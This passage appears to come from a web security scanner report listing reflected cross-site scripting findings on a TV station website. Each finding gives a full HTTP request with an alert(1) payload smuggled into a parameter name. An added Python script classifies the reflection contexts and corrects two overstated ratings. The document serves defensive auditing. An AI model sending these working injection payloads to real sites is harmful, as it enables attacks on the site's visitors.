Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Note that this response is a standalone script (text/javascript) rather than an HTML page: the injected code runs in the origin of whichever document includes this URL with a script tag, so impact against www.cbs6albany.com depends on a same-origin page sourcing load.php with an attacker-influenced query string (since the parameter name itself is reflected, any name will do). A third-party page that includes the URL itself only runs the code in its own origin.

Request

GET /common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page&67037*/alert(1)//a0d841c9b61=1 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:43:10 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:43:10 GMT
ETag: "1d0c52853ddbe1f2f6ea7445acd94b09-26445"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:43:10 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/javascript
Content-Length: 26445

/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav,common_tabBox,common_contentslider,common_freedom,common_ads,common_page&67037*/alert(1)//a0d841c9b61=1 */
   function loadPoll(pollid,sitecode)
   {
           var pollwrapper = document.getElementById('pollwrapper');
           var scriptname = "/onsetfeature/pollcap.php?station=" + sitecode;
           getPollResult(polli
...[SNIP]...

4.829. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /common/tools/load.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the comment that opens a generated stylesheet, which the server returns with Content-Type: text/css. The scanner reports the context as plain text between HTML tags; the response below shows that it is a CSS block comment, not HTML. The payload e196f<script>alert(1)</script>3cfc0cbcbcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept shows the reflection but not script execution: inside a stylesheet a script tag is inert, and this payload never leaves the comment. The sequence that matters in this context is */, which would end the comment and allow injected rules into the site's own stylesheet (CSS injection rather than XSS); the High/Certain rating should be revisited on that basis.

Request

GET /common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site&e196f<script>alert(1)</script>3cfc0cbcbcf=1 HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:43:21 GMT
Server: Apache
Last-Modified: Sat, 29 Jan 2011 01:43:21 GMT
ETag: "0b17a42b1d2521257d3d09f126491899-80086"
Cache-Control: max-age=86400
Expires: Sun, 30 Jan 2011 01:43:21 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/css
Content-Length: 80086

/* http://www.cbs6albany.com/common/tools/load.php?css=common_poll,common_layout_newspaper_nonav,common_nav,common_bcstyle,common_search,common_election,common_zvents,common_broadcast,site&e196f<script>alert(1)</script>3cfc0cbcbcf=1 */
.articlepoll #pollwrapper {
width:249px;
}

.pollbars {
   font-family: Arial, Helvetica;
   font-size: 10px;
   font-style: normal;
   color: #ffffff;
   background-color: #000066;
   line-height:
...[SNIP]...
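
The two load.php findings above land in a block comment at the head of a generated script or stylesheet, which is a different proposition from the HTML-attribute and JavaScript-string echoes reported for the /sections/ pages further down. The Python below is an added example, not part of the CloudScan report or of the site: it takes a response body, its Content-Type and the scanner's canary, works out which syntactic context the echo landed in, whether the canary actually carries the characters needed to leave that context, and whether the result fires on plain navigation or only when the resource is included from an HTML page. The four sample bodies are constructed from fragments shown in findings 4.828, 4.829, 4.830 and 4.845; the canaries are the scanner's, while the function names and context labels are this example's own. It generalises beyond the two comment cases to the attribute and string contexts that appear later in this report.

```python
"""Reflection-context triage for the load.php / sections / iframe_header findings.

Added example; not code from the CloudScan report or from cbs6albany.com. The
sample bodies are constructed from response fragments in findings 4.828, 4.829,
4.830 and 4.845; the markers are the scanner's canaries, everything else here is
an assumption of this example.
"""
from typing import Optional

# What a payload must carry, unmodified, to leave each context.
BREAKOUT = {
    "js_comment": "*/", "css_comment": "*/",
    "html_attr_single": "'>", "html_attr_double": '">',
    "js_string_single": "';", "js_string_double": '";',
    "html_text": "<",
}
# What an unclosed /* means, by the MIME type the response was served with.
COMMENT_BY_MIME = {
    "text/javascript": "js_comment", "application/javascript": "js_comment",
    "application/x-javascript": "js_comment", "text/css": "css_comment",
}


def find_context(body: str, marker: str) -> Optional[str]:
    """Heuristic context of the first echo of marker (None if not reflected).

    Models only what this report shows: block comments, quoted tag attributes,
    string literals in inline <script>, and plain text. Quote counting ignores
    backslash escapes, which is enough for scanner canaries.
    """
    i = body.find(marker)
    if i < 0:
        return None
    before = body[:i]
    low = before.lower()
    c = before.rfind("/*")                        # unclosed block comment?
    if c >= 0 and before.find("*/", c) < 0:
        return "block_comment"
    s = low.rfind("<script")                      # unclosed inline script?
    if s >= 0 and low.find("</script", s) < 0:
        code = before[before.find(">", s) + 1:]
        if code.count("'") % 2:
            return "js_string_single"
        if code.count('"') % 2:
            return "js_string_double"
        return "js_code"
    lt, gt = before.rfind("<"), before.rfind(">")  # inside a tag?
    if lt > gt:
        tag = before[lt:]
        if tag.count("'") % 2:
            return "html_attr_single"
        if tag.count('"') % 2:
            return "html_attr_double"
        return "html_tag"
    return "html_text"


def assess(body: str, content_type: str, marker: str) -> dict:
    """Where the canary landed, whether it escaped, and what it takes to fire."""
    ctx = find_context(body, marker)
    if ctx is None:
        return {"reflected": False}
    mime = content_type.split(";", 1)[0].strip().lower()
    if ctx == "block_comment":
        ctx = COMMENT_BY_MIME.get(mime, ctx)
    breakout = BREAKOUT.get(ctx, "")
    escapes = bool(breakout) and breakout in marker
    # Script that breaks out of a text/html body runs when the victim opens the
    # URL. A text/javascript body runs only when an HTML page on this origin
    # includes it via <script src>. A text/css body never runs script: leaving
    # the comment there is CSS injection, not XSS.
    if mime == "text/html":
        fires, note = escapes, "reflected XSS: executes on navigation"
    elif ctx == "js_comment":
        fires, note = False, "script resource: needs <script src> inclusion from this origin"
    elif ctx == "css_comment":
        fires, note = False, "stylesheet: <script> is inert here, only */ leaves the comment"
    else:
        fires, note = False, "non-HTML body: check how it is consumed before rating"
    return {"reflected": True, "context": ctx, "breakout": breakout,
            "escapes_context": escapes, "fires_on_direct_load": fires, "note": note}


# Constructed samples, cut down from the responses shown in this report.
JS_MARKER = "67037*/alert(1)//a0d841c9b61"
JS_BODY = ("/* http://www.cbs6albany.com/common/tools/load.php?js=common_poll,common_nav&"
           + JS_MARKER + "=1 */\n   function loadPoll(pollid,sitecode)\n   {\n")
CSS_MARKER = "e196f<script>alert(1)</script>3cfc0cbcbcf"
CSS_BODY = ("/* http://www.cbs6albany.com/common/tools/load.php?css=common_poll,site&"
            + CSS_MARKER + "=1 */\n.articlepoll #pollwrapper {\nwidth:249px;\n}\n")
ATTR_MARKER = "74765'><script>alert(1)</script>438a92d147a"
ATTR_BODY = "<html>\n<body>\n<a href='/sections/abouthdtv/?" + ATTR_MARKER + "=1'>\n"
STR_MARKER = "2c6a0';alert(1)//11741c449be"
STR_BODY = ("<html>\n<head>\n<script type='text/javascript'>var freedom = new DartAds("
            "{domain: 'fbi.wrgb.cbs6albany',taxonomy: 'entertainment" + STR_MARKER
            + "',ref: 'cbs6albany.com'});\n</script>\n")

if __name__ == "__main__":
    for name, body, ctype, marker in [("4.828", JS_BODY, "text/javascript", JS_MARKER),
                                      ("4.829", CSS_BODY, "text/css", CSS_MARKER),
                                      ("4.830", ATTR_BODY, "text/html", ATTR_MARKER),
                                      ("4.845", STR_BODY, "text/html", STR_MARKER)]:
        print(name, assess(body, ctype, marker))
```

Run it and the text/css case comes back with escapes_context False: the script-tag canary never leaves the comment, so nothing in finding 4.829 supports a High/Certain rating. The text/javascript case does escape, but fires_on_direct_load is False; the bug is real, and its impact depends on a cbs6albany.com page including the attacker's load.php URL as a script.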

4.830. http://www.cbs6albany.com/sections/abouthdtv/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/abouthdtv/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 74765'><script>alert(1)</script>438a92d147a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The echoed text is the page's own URL, query string included, inside a single-quoted href: the self-referencing link is built from the raw request URI. The same sink recurs on every /sections/ page reported below (4.831 to 4.844), which points to one shared template rather than fifteen independent bugs.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/abouthdtv/?74765'><script>alert(1)</script>438a92d147a=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/abouthdtv/?74765'><script>alert(1)</script>438a92d147a=1'>
...[SNIP]...

4.831. http://www.cbs6albany.com/sections/contactus/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/contactus/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffa76'><script>alert(1)</script>48177ec7652 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/contactus/?ffa76'><script>alert(1)</script>48177ec7652=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:59 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:59 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/contactus/?ffa76'><script>alert(1)</script>48177ec7652=1'>
...[SNIP]...

4.832. http://www.cbs6albany.com/sections/contactus/newstips/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/contactus/newstips/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c9651'><script>alert(1)</script>849d20d07f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/contactus/newstips/?c9651'><script>alert(1)</script>849d20d07f1=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 44060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/contactus/newstips/?c9651'><script>alert(1)</script>849d20d07f1=1'>
...[SNIP]...

4.833. http://www.cbs6albany.com/sections/employmentopportunities/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/employmentopportunities/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2930b'><script>alert(1)</script>bd162823394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/employmentopportunities/?2930b'><script>alert(1)</script>bd162823394=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:32:17 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:42:17 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/employmentopportunities/?2930b'><script>alert(1)</script>bd162823394=1'>
...[SNIP]...

4.834. http://www.cbs6albany.com/sections/jobsonline/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/jobsonline/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9cfe9'><script>alert(1)</script>7666009c44c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/jobsonline/?9cfe9'><script>alert(1)</script>7666009c44c=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:32:52 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:42:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43006


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/jobsonline/?9cfe9'><script>alert(1)</script>7666009c44c=1'>
...[SNIP]...

4.835. http://www.cbs6albany.com/sections/live-cameras/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/live-cameras/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 129c2'><script>alert(1)</script>b7126808f47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/live-cameras/?129c2'><script>alert(1)</script>b7126808f47=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:00 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 43174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/live-cameras/?129c2'><script>alert(1)</script>b7126808f47=1'>
...[SNIP]...

4.836. http://www.cbs6albany.com/sections/local-news/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/local-news/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73375'><script>alert(1)</script>a26b2e249d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/local-news/?73375'><script>alert(1)</script>a26b2e249d1=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 87796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/local-news/?73375'><script>alert(1)</script>a26b2e249d1=1'>
...[SNIP]...

4.837. http://www.cbs6albany.com/sections/local-sports/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/local-sports/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 33bcf'><script>alert(1)</script>7d78819feea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/local-sports/?33bcf'><script>alert(1)</script>7d78819feea=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:56 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 74325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/local-sports/?33bcf'><script>alert(1)</script>7d78819feea=1'>
...[SNIP]...

4.838. http://www.cbs6albany.com/sections/production-department/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/production-department/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c35d'><script>alert(1)</script>68cf49f6df8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/production-department/?9c35d'><script>alert(1)</script>68cf49f6df8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:40:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/production-department/?9c35d'><script>alert(1)</script>68cf49f6df8=1'>
...[SNIP]...

4.839. http://www.cbs6albany.com/sections/publicfile/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/publicfile/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93a58'><script>alert(1)</script>726a8db5fcf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/publicfile/?93a58'><script>alert(1)</script>726a8db5fcf=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:52 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42570


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/publicfile/?93a58'><script>alert(1)</script>726a8db5fcf=1'>
...[SNIP]...

4.840. http://www.cbs6albany.com/sections/sales/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sales/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 42536'><script>alert(1)</script>808b664d1ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/sales/?42536'><script>alert(1)</script>808b664d1ae=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
